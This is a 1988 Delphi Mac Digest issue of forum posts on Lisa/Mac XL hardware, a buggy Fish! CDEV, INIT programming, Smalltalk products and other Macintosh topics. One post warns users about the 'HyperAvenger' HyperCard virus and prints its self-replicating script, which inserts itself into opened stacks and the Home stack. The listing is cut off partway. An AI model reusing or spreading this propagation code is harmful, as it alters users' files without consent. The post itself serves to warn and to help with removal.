[comp.sys.mac.digest] Delphi Mac Digest V4 #14

SHULMAN@sdr.slb.COM (Jeffrey Shulman) (08/22/88)

Date: Mon 22 Aug 88 11:21:47-EDT
From: Jeff Shulman <SHULMAN@SDR.SLB.COM>
Subject: Delphi Mac Digest V4 #14
To: Delphi-List: ;

Delphi Mac Digest     Monday, August 22, 1988        Volume 4 : Issue 14

Today's Topics:
     RE: Usenet Mac Digest V4 #98
     Fish! CDEV
     RE: Usenet Mac Digest V4 #103
     Ham radio info
     INITs and Managers
     FSQueueHook Global (2 messages)
     hypercard virus
     FLIGHT PLAN PROGRAM FOR MAC
     RE: Smalltalk V/Mac? (2 messages)
     re: changing the date format
     re: Foreign Languages for Mac?
     re: File copying routines? Boot blocks?
     re: LaserWriter Type
     re: sharing data between cdevs and INITs
     RE: LSC Beginner ? (2 messages)

From: MACLAIRD
Subject: RE: Usenet Mac Digest V4 #98 (Re: Msg 27160)
Date: 2-AUG-04:31: Network Digests

 To: esh@otter.hple.hp.com (Sean Hayes)
 Subject: Lisa (mac XL) help required

 >I would like to know how to reset the screen contrast for the Lisa
(Mac
 >XL) from within macworks. (I know there is/was a system call in the
old
 >pascal developers system to do this).

 I've thought about hacking this up, but ye-olde time-compression has as
 yet prevented me from.  The best workaround is to boot the Lisa Pascal
 Workshop (or Lisa Office System) and run the Preferences tool.  The
next
 best thing is to obtain a copy of XL Screen DA [from Dafax among
others]
 which was developed by

 Frederick Computer & Electronics Corporation
 11301 Tree View Lane
 Monrovia, MD  21770

 While you are in the Pascal Workshop, disassemble Preferences and
reverse-
 engineer it so we can get a real parameter RAM blaster under MacWorks!

 ------------------------------

 To: ken@gatech.edu (Ken Seefried III)
 Subject: Mac XL questions

 >I would like to get some information on the Macintosh XL:

 >*     what does a lisa give you that a mac does not, and vice versa
 - You get a bigger screen, which with the Screen Fix Kit (available
from
   Dafax and Sun Remarketing) is extremely very much more usable than
the
   one in a Macintosh 512K.
 - You get a slower processor, which combined with the larger bitmap for
   the screen produces a noticably slower computer.
 - You get a lot of other features aimed at reliability.  For instance,
   parity-checked memory, not available on any other Macintosh.
 - You get a machine which Apple never even heard of[anymore].
 - With a Macintosh, you get the ability to make sounds, not just beeps.
 >*     what mac software does it not run
 The aim of MacWorks Plus! is to have full Macintosh Plus compatibility
 including the ability to run System 6.0, with a NOP'd Sound Manager.
 >*     where can you get memory boards (up to 4MB, no?)
 I have heard rumors of a 4MB board.  Ask on Genie.  The 2MB board is
 the AST RamStak, available at least from Sun.
 >*     can you add one of those 68020 expansion boards
 Not so far as I know.
 >*     can you add a bigger hard disk
 There are 20 MB internal drives available from Sun and external drives
 using the 2-Port Parallel card sold by Dafax.
 >*     what kind of hard disk interface does it use
 Proprietary.
 >*     how does it compare, performace wise, with a 128k mac? 512K?
Plus? SE?
 The Macintosh is faster, but the RAM, hard disk and larger screen make
it
 much more usable than the lugga-Macs.
 >*     are there interesting Lisa specific packages availible
 There was a PenMacXL graphics tablet, but I do not believe anyone is
doing
 commercial development for the Lisa today.
 >*       can the roms be upgraded, and to what level

 >*       what is the value of the Uniplus Unix implimentation for the
Lisa
 If you find an "uninstalled" copy, I want one.  Call me and make an
offer.
 >*       does it work with laser writer
 Not UniPlus+ (but I think you mean MacWorks).  The Lisa AppleTalks just
as
 well as a Macintosh.  Since all LaserWriter Drivers on a network should
be
 the same version, wait for MacWorks Plus! and System 6.
 >*       does it work with the telebit trailblazer plus
 I doubt it.  Rather, I doubt it's worth it.  Some terminal emulators
did a
 steady 19.2 on pre-SE Macintoshes, but the developers had to hack like
mad
 to do it, like bypassing QuickDraw.  For things that do not require
screen
 processing, like file transfers, there should be no problem.  The
software
 might still be so inefficient as to flat run out of steam, and you
could
 find yourself benchmarking terminal emulation packages.

 I own two Lisas.  They do what I ask them to.  However, why buy the
least
 expensive (and slowest) computer running Macintosh software and then
ask
 about all of the most expensive peripherals?

 Laird J. Heal
 Delphi:  MACLAIRD
 Home:  (603) 898-1406
 Away:  (312) 339-6582

------------------------------

From: TOMSAX
Subject: Fish! CDEV
Date: 2-AUG-06:09: Macintosh II

Last week I uploaded a CDEV called Fish! into the Mac II section. In
short it is a program that runs in the background and draws animated
fish swimming behind application windows. There is a color editor with
which to modify/create new fish. As is frequen tly the case, as soon as
we released the program to the general public, bugs emerged. Fish has
problem with system earlier than 5.0, multiple monitors, 256 color
monitors on 1-meg machines, some problems with other CDEVs, and with
changing the monitor depth while fish is running. Trying to run it with
systems earlier than 5.0 is certain death, the other vary from crashing
to trashing the desktop background. We're working on a new release as
much as our real jobs permit. In the meantime, exercise caution and keep
fish away from valuable data. (The worst thing we have heard about was a
trashed (5.0) system file.)

------------------------------

From: DDUNHAM
Subject: RE: Usenet Mac Digest V4 #103 (Re: Msg 27222)
Date: 7-AUG-03:39: Network Digests

>From: Mike_G_Newman@cup.portal.com
>Subject: Desktop Express
I sent a 77K Acta document to my editor with Desktop Express (it was a
review with some screen shots; it came through fine (assuming that the
changes which appeared in print were the editor's fault :-).  DX works
great and is extremely convenient.  The first time I tried it, I had a
problem, but never since.

 David Dunham     "If voting could change the system, it would be
illegal.  If
 Maitreya Design   not voting could change the system, it would be be
illegal."

------------------------------

From: RSTICKLE
Subject: Ham radio info
Date: 7-AUG-11:38: Mousing Around

I got a request from Belgium and am looking for information to pass
back. First are there any user-groups out there that specialize in Mac
amateur radio hookups that I can direct this person to? Second he
mentioned a program that he had heard about called MacTTY, it is
supposed to be from a company called Summit Concepts, has anyone heard
of it and could they provide a mailing address I can pass on. Thanks!
--Rick--

------------------------------

From: NATURAL
Subject: INITs and Managers
Date: 7-AUG-23:16: Programming

Ok you C dudes and dudettes --

We at NIC are the process of developing some INITs but we have come
across some problems and don't know exactly where to turn...

We're trying to using things like the dialog manager, get file, put
file, etc. etc. but it doesn't seem to want to work.  Questions:

1. Is this possible? 2. If so, which it should be since I've seen many
INITs that do it... how? 3. Do we need to initialize the managers? 4. Is
the initialization of the managers automatic? 5. Are there any great
examples/source codes/etc. floating around, preferably
   in Think C?

Thanks a lot in advance.

-- Joshua Wachs
-- Natural Intelligence Consulting

------------------------------

From: SQZDEV
Subject: FSQueueHook Global
Date: 8-AUG-19:02: Programming Techniques

Does anybody know where the use of the FSQueueHook low-memory global (at $3E2)
is documented. I think it is used for intercepting all File Manager requests but I wonder whether the hook routine is called before or after the File Manager
request is executed and if the A0 register is guaranteed to contain the
parameter block for the File Manager call in question. Also, can I use the
ioTrap field of the standard parameter block header to determine which File
Manager routine I am intercepting and whether the strcture of the parameter
block is MFS or HFS?

Is it possible that Apple's documentation on constructing an External File
System has documented the FSQueueHook routine interface?

Thanks in advance for your comments.

Gordon Finlay SQZDEV

------------------------------

From: DWB
Subject: RE: FSQueueHook Global (Re: Msg 2491)
Date: 9-AUG-00:10: Programming Techniques

I don't believe there is any public documentation on how FSQueueHook get's used.

Your best bet is probably to dig out the old MacNosy rom listings and see what
you can figure out.  As a matter of fact i'm not really even sure that it hasn't
changed recently.  You may also run into conflicts with AppleShare and possibly
other file server/sharer schemes because that's probably how they all work.

David

------------------------------

From: DRITTNER
Subject: hypercard virus
Date: 14-AUG 20:57 HyperCard

Folks, one of the members of my MUG found a virus in his home stack from some 14 year old.  I will upload the script here. I found this "virus" in my Home stack
today...I'm not sure where it came from,although it seems likely it came from
something I've downloaded from GENIEin the past few days and discarded.  The
"virus" is, as it states "harmless"in the sense that there is n o actual
permanent damage done, but I don't cons-ider this a harmless prank, and I hope
you don't either.  I spent an hour andahalf today getting this thing out of all
my stacks, and I plan to have a wordwith the Sysop of the Mac board on GENIE to
see if w e can't track down thelittle bugger who wrote this thing.Removal:  If
you find this script in your home stack, make sure you lock yourhome stack
before you start checking your other stacks, otherwise you will getreinfected
again.
-- Jeff Metzner
on openstack  --** The HyperAvenger **--
      put 2671798322 into sec  --** created 8/6/88 **--
      put the script of this stack into temp
      get the seconds
      if it > sec then --%This section checks to see if it is time for the
        beep 2   --%message to be displayed, and if so, displays it.
        set the loc of the message box to 22,300
        answer "Watch the message box..."
        put ""&B    "Greetings from the HyperAvenger!  I am the"&B
          " first HyperCard virus ever.  I was created by a mischievous "&B
          "14-year-old, and am completely harmless.  Dukakis for presiden"&B
          "t in '88,  Peace on Earth, and have a nice day.  {!_!}" into giggle
        put the number of chars of giggle
        repeat with x = 1 to 300
          put char x to x + 60 of giggle into the message box
          wait 1 ticks
        end repeat
        get offset ("--** The HyperAvenger **--",temp)
        --%Here it resets the date for displaying the message
        --%to 3 wks in the future.
        put the seconds + 1814400 into char it+33 to it+42 of temp
        set the script of this stack to temp
      end if
      put "--** The HyperAvenger **--" into sign
      if not (temp contains sign) then
        --%This part checks to see if the stack contains the virus; if not,
        --%it is installed.
        put the script of stack "home" into temp2
        get offset ("--** The HyperAvenger**--",temp2)
        put char it to it+2426 of temp2 into theCode
        put the seconds+ 1814400 into char 34 to 43 of theCode
        if temp contains "on openstack" then
          get offset ("on openstack",temp)
          put theCode after char it+12 of temp
        else
          put return&"on openstack"&return&theCode&"end openstack" after temp
      end if
      set the script of this stack to temp
    end if
    put the script of stack "home" into temp
    --%This part checks to see if the Home stack contains the virus; if
    --%not, it is installed.
    if not (temp contains sign) then
      put the script of this stack into temp2

------------------------------

From: USMCDI
Subject: FLIGHT PLAN PROGRAM FOR MAC
Date: 16-AUG 20:58 Programming

NEED A FLIGHT PLANNING PROGRAM FOR THE MACINTOSH.  HOPING FOR A PUBLIC DOMAIN
BUT WILL SEND FOR IF I NEED TO.
                                  THANKS
                                  USMCDI   (DAN)

------------------------------

From: RAMARREN
Subject: RE: Smalltalk V/Mac? (Re: Msg 2498)
Date: 19-AUG 06:12 Tools for Developers

Apple Smalltalk 0.4 is usable (particularly on a II; the performance on a plus I find too slow to allow me any forward motion :-)).

ParcPlace Smalltalk (the latest one, VM 2.3 release) is compatible with all Macs with minimum 2Meg memory.  Quoting from frangible memory:
Dorado Benchmark = 100

    Mac Plus 29
    Mac SE   35
    Mac II   110

(I believe this to be true... I am extrapolating from the VM
1.1 specs, VM 2.3 is a mite faster and there is one version for all machines,
unlike VM 1.1). In particular, the speed of (to me) the most critical part of a
development system, the editing, is more than acceptable even on the Mac Plus,
and down right cushy on the Mac II.

ParcPlace Smalltalk comes with a nice selection of tools for use with the Mac,
including some fileIns for reading/writing of MacPaint documents as Forms, color
support for the II, a PostScript output formatter for LW output, full
MultiFinder compatibility (yeah, lots of memory...) and an image can be quite
large - up to 16 MegBytes.  If you are in need of supporting someing fairly
unusual, like weird IO drivers etc, there are instructions for constructing up
to 255 new User Primitives in MPW C and generating a Smalltalk interface to your
odd needs.  The support is excellent, the people at ParcPlace are good (NOTE: I
am biased, friends work there) and the system is suitable for real applications
development.

By comparison: Apple Smalltalk v0.4 is a License 1 system in prototype,
ParcPlace Smalltalk v2.3 is a License 2 system, fully supported and nicely
'finished', which conforms to the Addison-Wesley source texts with many
enhancements and extensions.  Apple ST is an on-the-fly interpreter, ParcPlace
ST is a true incremental code compiler with very slick tricks.

There is another Smalltalk product that is due out RSN from the Digitalk folks,
makers of Smalltalk V in the IBM world called Smalltalk V/Mac. Smalltalk V is a
subset of the Smalltalk-80 system with a slightly different grammar and class
structure and not quite as large a system. Their Mac system is a departure from
the A-W Smalltalk, utilizing instead a Macintosh Menu/Window interface. It's
supposed to be runnable in a 1Meg machine.  I know little else at this point in
time (I've only seen announcement screenshots) and don't have much experience
with
Smalltalk V in any form to make any plus or minus comments.  Others who have
been using it say that it is functional and projects have been completed
successfully with it.

godfrey 8/19/88

disclaimer: I speak for myself, not ParcPlace, but I do have
friends there so I am a little biased.  The apple st offering has the advantage
of being very inexpensive for learning st.  :-)

------------------------------

From: NOFAL
Subject: RE: Smalltalk V/Mac? (Re: Msg 2500)
Date: 21-AUG 23:42 Tools for Developers

I agree with you that Parc PLace Systems has a great Smalltalk system. It's the
BEST ,but you pay for what you get Apple ST costs $50 and PP costs just under
$1000 I think.I think that they should bring down the price to about $500 so to
compete with other debelopment systems. I think that Smalltalk is the BEST
language ever created and that now that we have FAST computers like the Mac II
it's time to start using it.But until it's relatively cheap it won't outsell
languages like LS Pascal or C that under $200 offer a good value. I know that
the Xerox liscense is expensive but they won't sell into the mass market with
those prices.Smalltalk is great for both beginners and experience programers and should be available for bot both of them.
                                      Danny

------------------------------

From: DDUNHAM
Subject: re: changing the date format (Re: Msg 27292)
Date: 21-AUG 21:21 Network Digests

>From: Martin Yonke <YONKE@INTELLICORP.COM>
>Subject: changing the date format

You can change the system date format so it's 88-08-20 (or whatever) instead
of 08/20/88, but the problem is that Word must be using the short (numeric)
date format, instead of the long date (20 August 1988).  Maybe you can patch
where word calls IUDateString, but the way Word handles traps, it'd probably
be real difficult to find this.

From: DDUNHAM
Subject: re: Foreign Languages for Mac? (Re: Msg 27292)
Date: 21-AUG 21:22 Network Digests

>From: Mary Akers <makers@wash.bbn.com>
>Subject: Foreign Languages for Mac?

Read the owner's manual about using the [Option] key.

 David Dunham     "If it has syntax, it isn't user-friendly."
 Maitreya Design

------------------------------

From: DDUNHAM
Subject: re: File copying routines? Boot blocks? (Re: Msg 27294)
Date: 21-AUG 21:22 Network Digests

>From: kermit@phoenix.Princeton.EDU (kermit)
>Subject: File copying routines? Boot blocks?

You're not going to want to hear this, but you're going to have to use the
Finder to copy Get Info comments.  Under MultiFinder, the Finder keeps the
Desktop file (where such comments reside) open all the time, so at best you can
read comments.  But, under AppleShare, there is no such file -- they're kept
in the desktop database files.

 David Dunham     "If it doesn't have Undo, it's not a Mac program."
 Maitreya Design

------------------------------

From: DDUNHAM
Subject: re: LaserWriter Type (Re: Msg 27295)
Date: 21-AUG 21:23 Network Digests

>From: atieu@skat.usc.edu (Anthony Tieu)
>Subject: LaserWriter Type
Apple provides an AppleTalk ImageWriter driver; I don't understand your
question.  Chooser recognizes lots of stuff (including AppleShare).  Articles
in fairly recent MacTutors have explained how to write your own Chooser-
selectable printer driver.

 David Dunham     "Efficiency is intelligent laziness."
 Maitreya Design

------------------------------

From: DDUNHAM
Subject: re: sharing data between cdevs and INITs (Re: Msg 27296)
Date: 21-AUG 21:23 Network Digests

>From: t-benw@microsoft.UUCP (Benjamin Waldmin)
>Subject: sharing data between cdevs and INITs

In Findswell, the INIT and the cdev are in the same file, so it's pretty easy
for the cdev to set a resource (like the short term memory setting).  Screen
savers ought to be able to work the same way.  You can probably change a
resource but never call ChangedResource, if you never want to write anything
(tho this requires keeping the resource file open).

Memory manager structures could change if Apple implements virtual memory or
extends the number of address bits.

 David Dunham     "We've got the best government money can buy."
 Maitreya Design

------------------------------

From: NATURAL
Subject: RE: LSC Beginner ? (Re: Msg 2502)
Date: 21-AUG 23:25 Programming Techniques

I'm sorry... I am using LSC 3.0.

The 'spaz' is that when you hit a backspace, it keeps doing the printf's over
and over again.  And the loop is endless.

I cant get out of the loop unless I push the interupt key.  Pretty creative, eh
?

Any ideas?

Joshua

------------------------------

From: CHUQ
Subject: RE: LSC Beginner ? (Re: Msg 2503)
Date: 22-AUG 00:27 Programming Techniques

That's a known bug, last I heard. What you want to do is avoid scanf on input.
Rather, use gets() to input the line, and sscanf() to parse it. Grotty, but
true.

chuq

End of Delphi Mac Digest
-------